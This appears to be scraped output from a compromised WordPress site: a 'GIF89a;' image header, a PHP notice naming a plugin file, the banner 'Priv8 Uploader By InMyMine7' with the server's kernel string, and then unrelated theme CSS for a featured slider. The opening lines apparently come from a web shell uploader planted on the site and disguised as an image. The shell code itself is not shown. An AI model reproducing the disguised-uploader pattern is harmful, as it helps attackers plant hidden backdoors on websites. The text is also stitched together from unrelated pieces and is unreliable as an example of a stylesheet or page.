GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
/**
* Featured slider
************************************************/
#slider-container {
overflow: hidden;
width: 540px;
height: 250px;
margin: 10px auto;
}
#slider {
overflow: hidden;
width: auto;
height: 230px;
}
.feature {
overflow: hidden;
width: auto;
height: 210px;
padding: 10px 10px 0 10px;
color: #fff;
border: none !important;
}
.feature img {
float: left;
max-width: 240px;
margin: 0 15px 0 0;
border: 5px solid #001838;
}
#slider .feature .entry-title {
font-size: 21px;
}
#slider .feature .entry-title a {
color: #eee;
}
.feature .byline {
color: #aaa;
margin-bottom: 15px;
}
.more-link {
float: right;
text-indent: -9999px;
width: 100px;
height: 20px;
display: block;
background: url('../images/slider/more-link.gif') no-repeat 0 0;
}
.more-link:hover {
background: url('../images/slider/more-link.gif') no-repeat 0 -20px;
}
/* Slider controls */
.slider-controls {
float: left;
width: 100%;
height: 20px;
overflow: hidden;
clear: both;
line-height: 15px;
margin: 0 0 0;
display: block;
padding: 0 10px;
}
.slider-controls .slider-prev {
text-indent: -9999px;
float: left;
width: 22px;
height: 20px;
background: url('../images/slider/slider-prev.png') no-repeat 0 0;
border: none !important;
}
.slider-controls .slider-prev:hover {
background: url('../images/slider/slider-prev.png') no-repeat left -20px;
}
.slider-controls .slider-pause {
text-indent: -9999px;
float: left;
width: 22px;
height: 20px;
background: url('../images/slider/pause.png') no-repeat center 0;
border: none !important;
}
.slider-controls .slider-pause:hover, .slider-controls a.paused {
background: url('../images/slider/pause.png') no-repeat center -20px;
}
.slider-controls .slider-next {
text-indent: -9999px;
float: left;
width: 22px;
height: 20px;
background: url('../images/slider/slider-next.png') no-repeat right 0;
border: none !important;
}
.slider-controls .slider-next:hover {
background: url('../images/slider/slider-next.png') no-repeat right -20px;
}
h2.slider-title a, h2.slider-title {
color: #fff;
}
h2.slider-title a:hover, h2.slider-title:hover {
color: #fcff00;
}